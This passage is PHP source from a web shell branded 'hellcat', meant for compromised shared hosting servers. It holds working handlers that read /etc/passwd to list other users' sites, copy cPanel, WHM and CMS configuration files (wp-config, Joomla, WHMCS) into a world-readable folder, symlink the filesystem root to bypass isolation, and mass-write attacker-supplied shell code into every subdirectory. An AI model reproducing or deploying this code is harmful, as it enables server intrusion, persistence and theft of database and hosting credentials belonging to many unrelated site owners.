- <th><button class='coL-btn-option-active'><i class='fa fa-edit'></i></button></th>
- <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
- class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
- <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
- class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
- echo "<div class='coL-option top'>
- <br><br><br>
- <center>
- <i class='fa fa-file-o fa-3x'></i></center><br><br>";
- echo "<form action='?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
- <table cellspacing='0'>
- <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'><input type='text' value='".basename($_COEG['file'])."' name='rename'></td><td style='width:20%'>
- <button onmousedown='bleep.play();'
- type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
- </form></div>";
- }
- else if($_COEG['command'] == 'chmod') {
- if(isset($_COEG['perm'])) {
- if(chmod($_COEG['file'],octdec($_COEG['perm']))) {
- success('Chmod Ok !!');
- mtr("?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']);
- } else {
- error('Permission Denied !!');
- }
- }
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">CHMOD FILE</td></table></div>';
- echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
- <hr><table>';
- echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
- class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
- <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
- class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
- <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
- class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
- <th><button class='coL-btn-option-active'><i class='fa fa-cogs'></i></button></th>
- <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
- class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
- echo "<div class='coL-option top'>
- <br><br><br>
- <center>
- <i class='fa fa-file-o fa-3x'></i></center><br><br>";
- echo "<form action='?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
- <table cellspacing='0'>
- <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'>
- <input type='text' value='".substr(sprintf("%o", fileperms($_COEG['file'])), -4)."' name='perm' style='width:100%'>
- <input type='hidden' name='path' value='".$_COEG['file']."'></td><td style='width:20%'>
- <button onmousedown='bleep.play();'
- type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
- </form></div>";
- }
- elseif($_COEG['command'] == 'delete') {
- $delete = unlink($_COEG['file']);
- if($delete) {
- vars('<script>c("?'.x5.$dir.'");</script>');
- } else {
- error('Permission Denied !!');
- }
- }
- elseif($_COEG['command'] == 'jumping') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">JUMPING SERVER</td></table></div>';
- $i = 0;
- $s_a = fopen("/etc/passwd", "r");
- while($s_b = fgets($s_a)) {
- if($s_b == '' || !$s_a) {
- error("Can't Read [ /etc/passwd ]");
- mtr("?".x5.$dir);
- echo x9;
- } else {
- preg_match_all('/(.*?):x:/', $s_b, $s_c);
- foreach($s_c[1] as $s_d) {
- $s_e = "/home/$s_d/public_html";
- if(is_readable($s_e)) {
- $i++;
- $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-file'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'> <a href='?dir=$s_e'>[ $s_d ]</a></td>";
- if(is_writable($s_e)) {
- $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-info'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'>
- <a href='?dir=$s_e'><font color='red'>[ $s_d ]</font></a></td>";
- }
- echo $s_o;
- $s_k = file_get_contents("/etc/named.conf");
- if($s_k == '') {
- success('Server Not Found !!');
- mtr("?".x5.$dir);
- echo x9;
- } else {
- preg_match_all("#/var/named/(.*?).db#", $s_k, $s_v);
- foreach($s_v[1] as $s_x) {
- $s_g = posix_getpwuid(@fileowner("/etc/valiases/$s_x"));
- $s_g = $s_g['name'];
- if($s_g == $s_d) {
- echo "<td class='td-info'><a href='http://$s_x'>http://$s_x</a> </td></table>"; break;}}}}}}}
- if($i == 0) {
- error('Server Not Found !!');
- mtr("?".x5.$dir);
- echo x9;
- } else {
- echo "<div class='coL-option top'>Total : <span class='label label-default'> ".$i." <span></div>";
- }
- }
- elseif($_COEG['command'] == 'config') {
- $s_t = fopen("/etc/passwd", "r");
- $s_z = mkdir("hellcatindonesia", 0777);
- $s_s = "Options all\
- Require None\
- Satisfy Any";
- $s_d = fopen("hellcatindonesia/.htaccess","w");
- fwrite($s_d, $s_s);
- while($s_q = fgets($s_t)) {
- if($s_q == "" || !$s_t) {
- error('Can\'t Read etc/passwd !!');
- } else {
- preg_match_all('/(.*?):x:/', $s_q, $s_y);
- foreach($s_y[1] as $s_p) {
- $s_k = "/home/$s_p/public_html/";
- if(is_readable($s_k)) {
- $s_g = array(
- "/home/$s_p/.my.cnf" => "cpanel",
- "/home/$s_p/.accesshash" => "WHM-accesshash",
- "/home/$s_p/public_html/bw-configs/config.ini" => "BosWeb",
- "/home/$s_p/public_html/config/koneksi.php" => "Lokomedia",
- "/home/$s_p/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
- "/home/$s_p/public_html/clientarea/configuration.php" => "WHMCS",
- "/home/$s_p/public_html/whm/configuration.php" => "WHMCS",
- "/home/$s_p/public_html/whmcs/configuration.php" => "WHMCS",
- "/home/$s_p/public_html/forum/config.php" => "phpBB",
- "/home/$s_p/public_html/sites/default/settings.php" => "Drupal",
- "/home/$s_p/public_html/config/settings.inc.php" => "PrestaShop",
- "/home/$s_p/public_html/app/etc/local.xml" => "Magento",
- "/home/$s_p/public_html/joomla/configuration.php" => "Joomla",
- "/home/$s_p/public_html/configuration.php" => "Joomla",
- "/home/$s_p/public_html/wp/wp-config.php" => "WordPress",
- "/home/$s_p/public_html/wordpress/wp-config.php" => "WordPress",
- "/home/$s_p/public_html/wp-config.php" => "WordPress",
- "/home/$s_p/public_html/admin/config.php" => "OpenCart",
- "/home/$s_p/public_html/slconfig.php" => "Sitelok",
- "/home/$s_p/public_html/application/config/database.php" => "Ellislab");
- foreach($s_g as $s_h => $s_l) {
- $s_r = file_get_contents($s_h);
- if($s_r == '') {
- } else {
- $fcS = fopen("hellcatindonesia/$s_p-$s_l.txt","w");
- fputs($fcS,$s_r);
- }}}}}}
- success('OK !!');
- vars("<script>c('?".x5.$dir."/hellcatindonesia');</script>");
- }
- elseif($_COEG['command'] == 'cookie') {
- vars('<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">COOKIES MANAGER</td></table></div>');
- vars("<table class='table-info' cellspacing='0'>");
- vars("<th class='th-info cookie-td'><center>Name</center></th><th class='th-info' style='width:30px'><center><i class='fa fa-angle-right'></i></th><th class='th-info'><center>Value</center></th><tr class='ex-hov'>");
- if(count($_COOKIE) != 0) {
- foreach($_COOKIE as $c1 => $c2) {
- echo "<td class='td-info break'>".$c1."</td><td class='td-info' style='width:30px'><center><i class='fa fa-angle-right'></i></td><td class='td-info break'>".$c2."</td><tr class='ex-hov'>";
- }
- vars("</table>");
- }
- vars('<div class="coL-option" style="padding:7px">');
- vars("<table><td style='text-align:center;width:20px'><span class='label label-default'><i class='fa fa-angle-right'></i></span></td><td> Cookies Found : [ <font color='1D9D73'> ".count($_COOKIE)."</font> ]</td></table></div>");
- if(isset($_POST['c3'])) {
- if(setcookie($_POST['c3'],$_POST['c2'])) {
- success('Cookie Created !!');
- mtr('?'.x7.'cookie&'.x5.$dir);
- } else {
- error('Permission Denied !!');
- }
- }
- echo '<form style="margin:0px" action="?'.x7.'cookie&'.x5.$dir.'" method="POST">
- <table cellspacing="0" class="top">
- <td><input type="text" placeholder="Name" name="c3"></td>
- <td><input type="text" placeholder="Value" name="c2"></td>
- <td style="width:50px"><button onmousedown="bleep.play();"
- class="btn-exe" type="submit"><i class="fa fa-arrow-circle-right"></i></button></td></table></form>';
- }
- elseif($_COEG['command'] == 'cpanel') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CPANEL FINDER</td></table></div>';
- @ini_set('display_errors',0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- $d0mains = @file('/etc/named.conf');
- $domains = scandir("/var/named");
- if ($domains or $d0mains) {
- $domains = scandir("/var/named");
- if($domains) {
- echo "<table class='table-info' style='width:100%'><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center></th></tr>";
- $count=1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = '/home/'.$owner['name'].'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr>
- <td class='td-info' style='width:150px'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td>
- <td class='td-info'><a class='a' href='".$owner['name'].".txt' target='_blank'>OPEN</a></td></tr>";
- $dc++; }}}
- echo '</table>';
- $total = $dc;
- echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
- }else{
- $d0mains = @file('/etc/named.conf');
- if($d0mains) {
- echo "<table class='table-info' style='width:100%'><tr><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center> </th></tr>";
- $count=1;
- $dc = 0;
- $mck = array();
- foreach($d0mains as $d0main){
- if(@eregi('zone',$d0main)){
- preg_match_all('#zone "(.*)"#',$d0main,$domain);
- flush();
- if(strlen(trim($domain[1][0])) >2){
- $mck[] = $domain[1][0];
- } } }
- $mck = array_unique($mck);
- $usr = array();
- $dmn = array();
- foreach($mck as $o) {
- $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
- $usr[] = $infos['name'];
- $dmn[] = $o;
- }
- array_multisort($usr,$dmn);
- $dt = file('/etc/passwd');
- $passwd = array();
- foreach($dt as $d) {
- $r = explode(':',$d);
- if(strpos($r[5],'home')) {
- $passwd[$r[0]] = $r[5];
- }
- }
- $l=0;
- $j=1;
- foreach($usr as $r) {
- $dirz = '/home/'.$r.'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, $path.'/'.$r.'.txt');
- $p=file_get_contents($path.'/'.$r.'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr>
- <td class='td-info'><a target='_blank' href=http://".$dmn[$j-1]."/>".$dmn[$j-1]." </a></td>
- <td class='td-info'><a href='".$r.".txt'>OPEN</a> </center></td></tr>";
- $dc++;
- flush();
- $l=$l?0:1;
- $j++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
- }
- } else{
- error('Access Disabled !!');
- mtr('?'.x5.$dir);
- echo x9;
- }
- }
- elseif($_COEG['command'] == 'massdef') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">HELLCAT MODE</td></table></div>';
- echo '<div class="coL-option">';
- echo "<form action='?".x7."massdef&".x5.$dir."' method='post'>";
- echo "<table cellspacing='0'>
- <td align='left' style='padding:7px;width:60px'>
- Root :</td><td><input type='text' name='base_dir' style='width:100%' value='".getcwd()."'></td></tr>";
- echo "<tr><td align='left' style='padding:7px;width:60px'>File :</td><td> <input type='text' name='file_name' value='hellcat_shell.php' style='width:100%' placeholder=''></td></tr></table>";
- echo "<br>Source :<br><br>
- <textarea name='index'>Shell Code..</textarea>";
- echo "<input onmousedown='bleep.play();' type='submit' value='MODE ON' class='btn-exe' style='width:100%;margin-top:3px'></form></center></div>";
- if (isset ($_COEG['base_dir']))
- {
- if (!file_exists ($_COEG['base_dir'])) {
- $alert = "Destination Not Found !";
- failed1($alert); }
- @chdir ($_COEG['base_dir']) or die ("<script>alert('Cannot Open Directory');</script>");
- $files = @scandir ($_COEG['base_dir']) or die ("Oh Shit !!<br>");
- foreach ($files as $file):
- if ($file != "." && $file != ".." && @filetype ($file) == "dir")
- {
- $index = getcwd ()."/".$file."/".$_COEG['file_name'];
- if (file_put_contents ($index, $_COEG['index']))
- echo "
- <div class='coL-option break wrap' style='margin-top:2px;margin-bottom:2px'><span class='label-default'>+</span> Bartes Dwiky </span></div>"; }
- endforeach;
- }
- }
- elseif($_COEG['command'] == 'multihash') {
- vars('<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">MULTI HASH</td></table></div>');
- if($_COEG['encrypt']) {
- switch($_COEG['id']) {
- case '1':
- if(md5($_COEG['text'])) {
- vars("<div class='coL-option top'><table style='margin-bottom:3px'>
- <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Md5 :</td><td class='break'> ".md5($_COEG['text'])."</td></table></div>"); } else {
- error('Permission Denied !!');
- }
- break;
- case '2':
- if(crc32($_COEG['text'])) {
- vars("<div class='coL-option top'><table style='margin-bottom:3px'>
- <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Crc32 :</td><td class='break'> ".crc32($_COEG['text'])."</td></table></div>"); } else {
- error('Permission Denied !!');
- }
- break;
- case '3':
- if(sha1($_COEG['text'])) {
- vars("<div class='coL-option top'><table style='margin-bottom:3px'>
- <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Sha1 :</td><td class='break'> ".sha1($_COEG['text'])."</td></table></div>"); } else {
- error('Permission Denied !!');
- }
- break;
- case '4':
- vars("<div class='coL-option top'><table style='margin-bottom:3px'>
- <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr>
- <td class='td-md5'
- style='width:70px'><font color='#1D9D73'>+</font> Md5 :</td><td class='break'> ".md5($_COEG['text'])."</td><tr>
- <td class='td-md5'
- style='width:70px'><font color='#1D9D73'>+</font> Crc32 :</td><td class='break'> ".crc32($_COEG['text'])."</td><tr>
- <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Sha1 :</td><td class='break'> ".sha1($_COEG['text'])."</td></table></div>");
- break;
- }
- }
- vars("<div class='coL-option top'>
- <form action='?".x7."multihash&".x5.$dir."' method='post'>
- <table style='width:100%'>
- <td style='width:20%'>Text :</td><td style='width:80%'>
- <input type='text' name='text' style='width:100%'>
- </td><tr>
- <td style='width:20%'>Hash :</td><td style='width:80%'><select name='id' style='width:100%'>
- <option value='1'>Md5</option>
- <option value='2'>Crc32</option>
- <option value='3'>Sha1</option>
- <option value='4'>All</option>
- </select></td><tr><td style='width:20%'></td><td style='width:80%'>
- <input onmousedown='bleep.play();'
- type='submit' value='Create' name='encrypt' class='btn-exe' style='width:100px'></td></table></form></div>");
- }
- elseif($_COEG['command'] == 'symlink') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">MULTI SYMLINK</td></table></div>';
- if(is_readable("/etc/named.conf")) {
- $named = '<a href="?symlink=named.conf&dir='.$dir.'">OPEN</a>';
- } else {
- $named = '<font color="red">DISABLED</font>';
- }
- if(is_readable("/etc/valiases")) {
- $valiases = '<a href="?symlink=valiases&dir='.$dir.'">OPEN</a>';
- } else {
- $valiases = '<font color="red">DISABLED</font>';
- }
- if(is_readable("/etc/passwd")){
- $passwd = '<a href="?symlink=passwd&dir='.$dir.'">OPEN</a>';
- } else {
- $passwd = '<font color="red">DISABLED</font>';
- }
- if(is_readable("/var/named")){
- $var = '<a href="?symlink=var&dir='.$dir.'">OPEN</a>';
- } else {
- $var = '<font color="red">DISABLED</font>';
- }
- echo '<table class="table-info">';
- echo '<th class="th-info">From</th>';
- echo '<th class="th-info">Arrow</th>';
- echo '<th class="th-info">Action</th>';
- echo '<tr>';
- echo '<td class="td-info"><span class="label-default">+</span> [ /etc/named.conf ]</td><td class="td-info"><center>»</center></td><td class="td-info"><center>'.$named.'</a></center></td>';
- echo '<tr>';
- echo '<td class="td-info"><span class="label-default">+</span> [ /etc/valiases ]</td><td class="td-info""><center>»</center></td><td class="td-info"><center>'.$valiases.'</a></center></td>';
- echo '<tr>';
- echo '<td class="td-info"><span class="label-default">+</span> [ /etc/passwd ]</td><td class="td-info"><center>»</center></td><td class="td-info"><center>'.$passwd.'</a></center></td>';
- echo '<tr>';
- echo '<td class="td-info"><span class="label-default">+</span> [ /var/named/ ]</td><td class="td-info"><center>»</center></td><td class="td-info"><center>'.$var.'</a></center></td>';
- echo '</table>';
- @mkdir('hellcat',0777);
- @symlink("/","hellcat/root");
- $htaccss = "Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- file_put_contents("hellcat/.htaccess",$htaccss);
- $ms_2 = file_get_contents("/etc/passwd");
- $ms_2z = explode("\n",$ms_2);
- foreach($ms_2z as $ms_3){
- $ms_1 = explode(":",$ms_3);
- error_reporting(0);
- $ms_4 = posix_getcwd();
- $dr = explode("/",$ms_4);
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/blog/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/config.php',"hellcat/".$ms_1[0].'-PhpBB.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/config.php',"hellcat/".$ms_1[0].'-vBulletin.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/web/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/joomla/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/conf_global.php',"hellcat/".$ms_1[0].'-IPB.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/inc/config.php',"hellcat/".$ms_1[0].'-MyBB.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/Settings.php',"hellcat/".$ms_1[0].'-SMF.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/sites/default/settings.php',"hellcat/".$ms_1[0].'-Drupal.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/e107_config.php',"hellcat/".$ms_1[0].'-e107.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/datas/config.php',"hellcat/".$ms_1[0].'-Seditio.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/configure.php',"hellcat/".$ms_1[0].'-osCommerce.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/client/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientes/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/support/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/supportes/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmcs/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domain/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/hosting/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmc/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/billing/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/portal/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/order/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientarea/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domains/configuration.php',"hellcat/".$ms_1[0].'-WHMCS.txt'); }
- }
- elseif(isset($_REQUEST['symlink'])){
- switch ($_REQUEST['symlink']){
- case 'var':
- if(is_readable("/var/named")){
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ VAR/NAMED ]</td></table></div>';
- echo '<table class="table-info">';
- echo '
- <th class="th-info">Website</th>
- <th class="th-info" style="width:60px">User</th>
- <th class="th-info" style="width:40px">Action</th>';
- $ms_5 = scandir("/var/named");
- foreach($ms_5 as $ms_6){
- if(strpos($ms_6,".db")){
- $i += 1;
- $ms_6 = str_replace('.db','',$ms_6);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$ms_6));
- echo "<tr class='ex-hov'>
- <td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$ms_6." '>".$ms_6."</a></td>
- <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
- <td class='td-info'><center><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
- }
- }
- echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
- Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
- }else{ echo "<tr><td class='td-info'>can't read [ /var/named ]</td></table>";
- }
- break;
- }
- switch ($_REQUEST['symlink']){
- case 'passwd':
- error_reporting(0);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- if(is_readable("/etc/passwd")){
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ ETC/PASSWD ]</td></table></div>';
- echo '<table class="table-info">';
- echo '
- <th class="th-info">Website</th>
- <th class="th-info" style="width:60px">User</th>
- <th class="th-info" style="width:40px">Action</th>';
- $list = scandir("/var/named");
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- if($owner['name'] == $etcc[0]) {
- $i += 1;
- echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain." '>".$domain."</a></td>
- <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
- <td class='td-info'><center><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
- }}}}
- echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
- Total Domain : <font color='#1D9D73'>".$i."</font> </div>";}
- break;
- }
- switch ($_REQUEST['symlink']){
- case 'named.conf':
- if(is_readable("/etc/named.conf")){
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ ETC/NAMED.CONF ]</td></table></div>';
- echo '<table class="table-info">';
- echo '
- <th class="th-info">Website</th>
- <th class="th-info" style="width:60px">User</th>
- <th class="th-info" style="width:40px">Action</th>';
- $named = file_get_contents("/etc/named.conf");
- preg_match_all('%zone \"(.*)\" {%',$named,$domains);
- foreach($domains[1] as $domain){
- $domain = trim($domain);
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain." '>".$domain."</a></td><td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
- }
- echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
- Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
- } else { echo "<tr><td class='td-info'>can't read [ /etc/named.conf ]</td></tr>"; }
- break;
- }
- switch ($_REQUEST['symlink']){
- case 'valiases':
- if(is_readable("/etc/valiases")){
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">SYMLINK [ ETC/VALIASES ]</td></table></div>';
- echo '<table class="table-info">';
- echo '
- <th class="th-info">Website</th>
- <th class="th-info" style="width:60px">User</th>
- <th class="th-info" style="width:40px">Action</th>';
- $list = scandir("/etc/valiases");
- foreach($list as $domain){
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain."'>".$domain."</a></td><center><td class='td-info'><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='hellcat/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
- }
- echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
- Total Domain : <font color='#1D9D73'>".$i."</font></div>";
- } else { echo "<tr><td class='td-info'>can't read [ /etc/valiases ]</td></tr>"; }
- break;
- }
- }
- elseif($_COEG['command'] == 'change') {
- vars('<style> .tup { font-size: 14px; } </style>');
- vars('<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">CHANGE PASSWORD</td></table></div>');
- vars('<script>
- function validate(){
- var a = document.getElementById("newpass").value;
- var b = document.getElementById("confirm").value;
- if (a!=b) {');
- s('Password Do Not Match !!');
- vars('return false;
- }
- }
- </script>');
- function xs($file){
- return file_get_contents($file);
- }
- function chipt($plain){
- return md5($plain);
- }
- function changepass($plain){
- $npass = chipt($plain);
- $npass = "\$pass = \"".$npass."\";";
- $con = xs($_SERVER['SCRIPT_FILENAME']);
- $con = preg_replace("/\\\$pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$npass,$con);
- return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
- }
- if($_COEG['newpass']) {
- if(changepass($_COEG['newpass'])) {
- success('Password Changed !!');
- mtr('?'.x5.$dir.'&'.x7.'logout');
- } else {
- error('Unable To Change Password !!');
- }
- }
- echo "<div class='coL-option top'>
- <form method='post' onSubmit='return validate();' action='?".x7."change&".x5.$dir."'><table style='width:100%'>
- <td class='tup' style='width:120px'>Password :</td><td style='width:75%'><input type='password' id='newpass' name='newpass' style='width:100%'></td>
- <tr>
- <td class='tup' style='width:120px'>Confirm :</td><td style='width:75%'><input type='password' id='confirm' name='confirm' style='width:100%'></td>
- <tr>
- <td style='width:120px'></td><td style='width:75%'>
- <button onmousedown='bleep.play();'
